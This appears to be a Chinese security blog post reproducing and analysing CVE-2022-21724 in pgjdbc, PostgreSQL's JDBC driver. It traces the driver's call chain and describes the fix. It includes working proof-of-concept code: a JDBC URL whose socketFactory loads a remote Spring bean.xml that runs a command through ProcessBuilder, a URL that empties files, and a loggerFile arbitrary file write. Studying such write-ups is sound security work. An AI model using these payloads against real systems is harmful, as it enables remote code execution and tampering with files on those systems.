• 任意代码执行漏洞复现


    漏洞简介

    PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。 pgjdbc 根据通过 authenticationPluginClassNamesslhostnameverifiersocketFactorysslfactorysslpasswordcallback 连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。

    影响范围:

      9.4.1208 <=PgJDBC <42.2.25
    
      42.3.0 <=PgJDBC < 42.3.2
    
    • 1
    • 2
    • 3

    【一一帮助安全学习,所有梓料获取处一一】
    ①网络安全学习路线
    ②20份渗透测试电子书
    ③安全攻防357页笔记
    ④50份安全攻防面试指南
    ⑤安全红队渗透工具包
    ⑥网络安全必备书籍
    ⑦100个漏洞实战案例
    ⑧安全大厂内部教程

    漏洞复现

    创建 maven 项目,添加依赖

    <!-- https://mvnrepository.com/artifact/org.postgresql/postgresql -->
    <dependency>
        <groupId>org.postgresql</groupId>
        <artifactId>postgresql</artifactId>
        <version>42.3.1</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.springframework/spring-context-support -->
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-context-support</artifactId>
        <version>5.3.23</version>
    </dependency>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    编写测试代码

    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.sql.SQLException;
    
    public class cve202221724 {
        public static void main(String[] args) throws SQLException {
            String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
            String socketFactoryArg = "http://127.0.0.1:8080/bean.xml";
            String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory="+socketFactoryClass+ "&socketFactoryArg="+socketFactoryArg;
            Connection connection = DriverManager.getConnection(jdbcUrl);
        }
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    bean.xml

    <beans xmlns="http://www.springframework.org/schema/beans"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xmlns:p="http://www.springframework.org/schema/p"
           xsi:schemaLocation="http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd">
    <!--    普通方式创建类-->
       <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg>
              <list>
                <value>bash</value>
                <value>-c</value>
                <value>calc.exe</value>
              </list>
            </constructor-arg>
        </bean>
    </beans>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16

    image.png

    漏洞分析

    任意代码执行 socketFactory/socketFactoryArg
    image.png

    先将调试后的流程大概画出

    image.png

    java.sql.DriverManager#getConnection(java.lang.String)
    image.png

    java.sql.DriverManager#getConnection(java.lang.String, java.util.Properties, java.lang.Class)
    image.png

    利用 org.postgresql.Driver 的 jdbc 驱动去连接数据库

    org.postgresql.Driver#connect
    image.png

    调用 makeConnection 去连接数据库

    org.postgresql.Driver#makeConnection
    image.png

    org.postgresql.jdbc.PgConnection#PgConnection
    image.png

    org.postgresql.core.ConnectionFactory#openConnection
    image.png

    org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
    image.png

    org.postgresql.core.SocketFactoryFactory#getSocketFactory
    image.png

    PGProperty 是枚举类型 其中的 get 方法是判断枚举项的值有没有传入的 properties,如果存在就查找返回,没有就返回默认值
    image.png

    SOCKET_FACTORY(
          "socketFactory",
          null,
          "Specify a socket factory for socket creation"),
      SOCKET_FACTORY_ARG(
          "socketFactoryArg",
          null,
          "Argument forwarded to constructor of SocketFactory class."),
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    org.postgresql.util.ObjectFactory#instantiate
    image.png

    通过 newInstance 来实现对 ctor 类 的创建,同时 args 作为参数。构造方法中有且只有一个 String 参数的类就可以满足条件。

    • org.apache.commons.jxpath.functions.ConstructorFunction
    • org.apache.commons.jxpath.functions.MethodFunction
    • java.io.FileOutputStream

    通过利用 CVE-2017-17485 实现 Spring spel 执行任意命令 或者利用 FileOutputStream 将任意文件置空(jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=java.io.FileOutputStream&socketFactoryArg=test.txt)

    任意代码执行 sslfactory/sslfactoryarg

    image.png
    image.png

    image.png

    <init>:85, ClassPathXmlApplicationContext (org.springframework.context.support)
    newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
    newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
    newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
    newInstance:423, Constructor (java.lang.reflect)
    instantiate:62, ObjectFactory (org.postgresql.util)
    getSslSocketFactory:64, SocketFactoryFactory (org.postgresql.core)
    convert:34, MakeSSL (org.postgresql.ssl)
    enableSSL:546, ConnectionFactoryImpl (org.postgresql.core.v3)
    tryConnect:151, ConnectionFactoryImpl (org.postgresql.core.v3)
    openConnectionImpl:215, ConnectionFactoryImpl (org.postgresql.core.v3)
    openConnection:51, ConnectionFactory (org.postgresql.core)
    <init>:225, PgConnection (org.postgresql.jdbc)
    makeConnection:466, Driver (org.postgresql)
    connect:265, Driver (org.postgresql)
    getConnection:664, DriverManager (java.sql)
    getConnection:270, DriverManager (java.sql)
    main:17, cve202221724
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
    image.png

    尝试与数据库进行连接

    org.postgresql.core.v3.ConnectionFactoryImpl#tryConnect
    image.png

    建立连接后收到请求以 S 开头,进入 org.postgresql.ssl.MakeSSL#convert

    org.postgresql.core.v3.ConnectionFactoryImpl#enableSSL
    image.png
    image.png

    org.postgresql.ssl.MakeSSL#convert
    image.png

    org.postgresql.core.SocketFactoryFactory#getSslSocketFactory

    image.png

    任意文件写入 loggerLevel/loggerFile

    image.png
    image.png

    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.sql.SQLException;
    
    public class cve202221724 {
        public static void main(String[] args) throws SQLException {
            String loggerLevel = "debug";
            String loggerFile = "test.txt";
            String shellContent="test";
            String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
            Connection connection = DriverManager.getConnection(jdbcUrl);
        }
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    image.png

    org.postgresql.Driver#connect
    image.png

    org.postgresql.Driver#setupLoggerFromProperties
    image.png

    通过 设置扩展参数 LOGGER_FILE 指定日志文件保存位置,没有进行校验,所以可以跨目录的保存文件
    image.png

    生成临时文件,之后将日志信息保存到文件中

    org.postgresql.Driver#connect

    先通过 setupLoggerFromProperties 设定相关的参数 然后再利用 LOGGER.log 保存文件
    image.png

    漏洞修复

    针对代码执行的漏洞而言,要求获取的类名必须是指定类的子类,否则就抛出异常
    image.png

    对于任意文件写入而言,高版本中移除了对日志文件的设定操作 setupLoggerFromProperties(props);
    image.png

  • 相关阅读:
    RS232和RS485
    生产设备巡检管理系统
    并发编程(一)可见性
    QModbus库使用,并作为ROS节点发布话题及程序CMakelist编写
    你知道哪些常用快捷键?电脑快捷键大全,打工人必备!
    烟花爆竹厂如何做到0风险0爆炸事故?AI+视频监控平台给出答案
    中国象棋开源人工智能程序(带UI)搬运
    【愚公系列】2022年09月 微信小程序-WebGL动画的使用
    【C++】:类和对象(上)
    数据结构-- 并查集
  • 原文地址:https://blog.csdn.net/kali_Ma/article/details/127948143